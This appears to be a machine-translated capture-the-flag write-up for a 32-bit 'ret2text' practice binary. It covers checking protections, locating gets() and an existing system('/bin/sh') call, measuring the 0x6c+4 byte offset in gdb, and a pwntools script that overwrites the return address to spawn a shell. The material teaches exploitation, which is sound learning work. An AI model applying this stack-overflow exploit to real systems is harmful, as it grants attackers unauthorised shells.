1. First run the program
2. Simply check the program, 32 program, open some Relro protection, there NX protection (in fact, no impact)
3. The observation main function is difficult to find covered by the return value gets () function of the input.
4. found system ( "/ bin / sh") there ida code, and may be configured so that in fact we have exp, now only needs to measure the length of the cover
5. Loading gdb a breakpoint at the call gets in, after reviewing the registers (different systems may vary)
EBP: 0xffffd168 --> 0x0
ESP: 0xffffd0e0 --> 0xffffd0fc --> 0xf7ffd000 --> 0x26f34
6. 0x168 - 0xfc = 0x6c, then you can write a exp
#!/usr/bin/env python from pwn import * #EBP = 0xffffd168 #ESP = 0xffffd0e0 -> 0xffffd0fc -> 0xf7ffd000 -> 0x26f34 #padding_num1 = d168 - d0fc = 0x6c #padding_num2 = 4 (32-bit) p = process('./ret2text') bin_sh_addr = 0x804863A payload = 'a' * (0x6c + 0x4) + p32(bin_sh_addr) p.recvuntil('thing?') p.sendline(payload) p.interactive()
